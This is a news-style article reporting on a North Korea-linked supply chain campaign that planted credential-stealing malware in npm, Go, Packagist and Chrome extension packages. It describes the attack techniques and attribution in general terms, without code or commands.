North Korea’s Stealthy Code Attack Hits npm and Beyond

Imagine an invisible army sneaking into the tools developers rely on every day. That’s exactly what’s happening right now. North Korean hackers launched a sophisticated campaign that hijacks open-source software packages to steal the keys to digital kingdoms.
Six npm Packages, One Hidden Threat
Security researchers uncovered six malicious npm packages crafted to steal developer secrets. These packages don’t just deliver malware directly—they use layered delivery chains that slip past detection. The first stage looks innocent, installing hidden dependencies disguised as simple SVG utilities. But beneath the surface, they fetch secret payloads from a remote JSON source.
Once activated, these payloads unleash a powerful toolkit. The malware steals credentials tied to AWS, Microsoft Azure, Google Gemini, and Anthropic Claude. It snatches SSH keys and even targets cryptocurrency wallets. Clipboard contents vanish, browser data disappears, and files get harvested—all without raising alarms.
Beyond npm: The Attack Spreads
This isn’t an isolated npm incident. The campaign has infected 108 open-source packages scattered across multiple ecosystems. Researchers identified 162 malicious release artifacts, including 80 Go modules, 10 Packagist packages, and even a Chrome extension. The attackers hijack legitimate maintainer accounts to slip malware into trusted repositories.
They manipulate Git histories with force pushes and anti-dated commits. This clever trick hides malicious code changes from casual inspection. Obfuscated JavaScript loaders hide in plain sight—camouflaged inside whitespace padding or fake font files. Visual Studio Code task files become secret launchpads, silently executing harmful code the moment a developer opens a project.
Using Web3 and Blockchain to Stay Hidden
The initial malware stage is a crafty JavaScript loader that taps into blockchain infrastructure on TRON, BNB Smart Chain, and Aptos. It pulls encrypted payloads directly from decentralized networks. This Web3 approach bypasses traditional filtering and blacklists, making the attack nearly invisible to defense tools.
The secondary payloads, known as OmniStealer and DEV#POPPER, give attackers full control. They can steal credentials, execute commands remotely, and siphon crypto wallets. Attackers also aim for high-value targets like Kubernetes tokens to move laterally inside organizations. The scope and stealth of the campaign make it a nightmare for defenders.
Who’s Behind the Campaign?
Evidence points to North Korean threat actors tied to groups called Contagious Interview and Famous Chollima. These groups have been linked to similar attacks since 2018. In April 2026, a massive Lazarus npm operation published 108 malicious packages across 261 versions, delivering malware families aligned with these clusters.
One GitHub account named Xpos587 was used to update multiple projects at once, showing how attackers seize control of trusted maintainers. An organization called 7span manages some of the compromised repositories. This campaign has grown larger than previously reported, spreading across npm, Packagist, Go modules, and Chrome extensions.
Why This Matters to Developers
Developers trust open-source tools to build software safely. This campaign exploits that trust by slipping dangerous code into everyday dependencies. The stolen credentials can give attackers access to cloud infrastructure, wallets, and sensitive developer environments.
Hidden in legitimate-looking files, the malicious code is nearly impossible to detect without expert analysis. The layered design, use of decentralized Web3 networks, and stealthy repository manipulation show a new level of sophistication. Developers and organizations must stay alert and audit dependencies carefully.
Looking Ahead
This attack signals a new era of supply chain threats. Cybercriminals are targeting the very tools developers rely on, turning open-source ecosystems into battlegrounds. The use of blockchain infrastructure to evade detection adds a dangerous twist. Will defenders keep up?
As this campaign expands, the cybersecurity community faces a critical challenge. Developers, maintainers, and security teams must join forces to defend the supply chain. Vigilance, transparency, and advanced detection tools will be key to stopping the next wave of malicious code hiding in plain sight.
Based on
- North Korea-linked npm packages impersonate Rollup polyfill tools to steal developer secrets — thenextweb.com
- North Korea-Linked PolinRider Campaign Hits 108 Open Source Packages and Extensions — cyberpress.org
- North Korea-Linked Hackers Hide JavaScript Loaders in Open Source Repositories — cybersecuritynews.com
- PolinRider supply chain attack expands to Packagist ecosystem — developer-tech.com
- Axios npm Hack: How North Korean Hackers Hijacked a Maintainer Account Using Fake Teams Error Fix (2026) — theemailmarketingguy.com




